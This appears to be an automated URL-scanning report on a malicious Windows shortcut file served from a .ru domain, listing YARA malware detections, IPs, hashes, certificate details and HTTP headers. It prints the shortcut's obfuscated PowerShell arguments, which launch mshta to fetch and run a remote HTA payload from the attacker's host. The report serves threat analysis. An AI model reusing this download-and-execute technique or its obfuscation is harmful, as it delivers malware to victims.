Report - t1.handprintscariness.ru/1.lnk

Report Overview

Visited public
2025-05-09 06:16:28
Tags
URL
t1.handprintscariness.ru/1.lnk
Finishing URL
about:privatebrowsing
IP / ASN
104.21.87.203
#13335 CLOUDFLARENET
Title
about:privatebrowsing

Detections

urlquery

Network Intrusion Detection

Threat Detection Systems

Domain Summary

Domain / FQDN	Rank	Registered	First Seen	Last Seen	Sent	Received	IP
t1.handprintscariness.ru	unknown	unknown	No data	No data	498 B	2.7 kB	172.67.145.242

Related reports

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro

No alerts detected

Threat Detection Systems

Public InfoSec YARA rules

Scan Date	Severity	Indicator	Alert
2025-05-09	medium	t1.handprintscariness.ru/1.lnk	Identifies PowerShell artefacts in shortcut (LNK) files.
2025-05-09	medium	t1.handprintscariness.ru/1.lnk	Identifies executable artefacts in shortcut (LNK) files.
2025-05-09	medium	t1.handprintscariness.ru/1.lnk	Identifies shortcut (LNK) file with a long relative path. Might be used in an attempt to hide the path.

OpenPhish

No alerts detected

PhishTank

No alerts detected

Quad9 DNS

No alerts detected

ThreatFox

No alerts detected

Windows Shortcut detected

URL
t1.handprintscariness.ru/1.lnk
IP / ASN
172.67.145.242
#13335 CLOUDFLARENET

File type
MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=0, Unicoded KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, length=0, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
Hash
MD5 2902a07bc9ea1f31fc205e4206703543
SHA1 643e923a31866776acc4c36c7a79afb27315930c
SHA256 9834bac2717ea3cdfe8f92f8577af0e2ae0be9f34554a7cfb6de70add1eb1421

Timestamps
Created 2185-07-21 23:34:33
Access 2185-07-21 23:34:33
Write 2185-07-21 23:34:33
Command-line data
Working Directory
Relative Path
..\..\..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command Line Arguments
scb ('m%%%%shta%%%% %%h%tt%%%%ps:%%%%/%/%%t%1.%ha%%ndp%%%%rin%%%t%%s%%car%%%%i%%n%%%%e%s%%s.ru%%/a%.htm%%l%%%%'.replace('%',''));iex (gcb)

Detections

Analyzer	Verdict	Alert
Public InfoSec YARA rules	malware	Identifies PowerShell artefacts in shortcut (LNK) files.
Public InfoSec YARA rules	malware	Identifies executable artefacts in shortcut (LNK) files.
Public InfoSec YARA rules	malware	Identifies shortcut (LNK) file with a long relative path. Might be used in an attempt to hide the path.

JavaScript (0)

HTTP Transactions (1)

URL IP Response Size

t1.handprintscariness.ru/1.lnk

172.67.145.242

200 OK

1.7 kB

URL User Request GET
t1.handprintscariness.ru/1.lnk
IP
172.67.145.242:443
ASN
#13335 CLOUDFLARENET

Certificate
IssuerGoogle Trust Services
Subject9c9ab6a7.sni.cloudflaressl.com
Fingerprint2D:F5:B1:73:3F:17:7C:71:E0:9D:8E:58:7A:68:7B:3E:1F:B9:E8:C0
ValidityMon, 05 May 2025 13:25:05 GMT - Sun, 03 Aug 2025 14:24:53 GMT

File type
MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=0, Unicoded KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, length=0, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
Size
1.7 kB (1720 bytes)
Hash
2902a07bc9ea1f31fc205e4206703543
643e923a31866776acc4c36c7a79afb27315930c
9834bac2717ea3cdfe8f92f8577af0e2ae0be9f34554a7cfb6de70add1eb1421

Detections

Analyzer	Verdict	Alert
Public InfoSec YARA rules	malware	Identifies PowerShell artefacts in shortcut (LNK) files.
Public InfoSec YARA rules	malware	Identifies executable artefacts in shortcut (LNK) files.
Public InfoSec YARA rules	malware	Identifies shortcut (LNK) file with a long relative path. Might be used in an attempt to hide the path.

HTTP Headers

GET /1.lnk HTTP/1.1
Host: t1.handprintscariness.ru
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache

HTTP/2 200 OK
date: Fri, 09 May 2025 06:15:56 GMT
content-type: application/x.ms.shortcut
content-length: 1720
accept-ranges: bytes
etag: "2902a07bc9ea1f31fc205e4206703543"
last-modified: Thu, 08 May 2025 18:13:37 GMT
vary: Accept-Encoding
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u0qPkDcA9uOqYRApBLWYEu6PKLZgATmhpit7ivF6jE%2FSsVuHncnQshaDnHsEjJqX6wsAaJWRFDMPDvjiI8wcWHjS21ldZ71Hg23HP%2Ban46GN7NVhUhV5xothXfAQiGh8P5BL9wZzKOhoe38%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
speculation-rules: "/cdn-cgi/speculation"
server: cloudflare
cf-ray: 93cf10af8a5bb4fa-OSL
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=5715&min_rtt=560&rtt_var=10346&sent=8&recv=11&lost=0&retrans=0&sent_bytes=3246&recv_bytes=1135&delivery_rate=6268398&cwnd=254&unsent_bytes=0&cid=668269b338e2e9f7&ts=371&x=0"
X-Firefox-Spdy: h2

Report Overview

Domain Summary

Related reports

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Threat Detection Systems

Public InfoSec YARA rules

OpenPhish

PhishTank

Quad9 DNS

ThreatFox

Windows Shortcut detected

File type

Hash

Timestamps

Command-line data

JavaScript (0)

HTTP Transactions (1)

URL User Request GET

IP

ASN

Certificate

File type

Size

Hash

Detections

HTTP Headers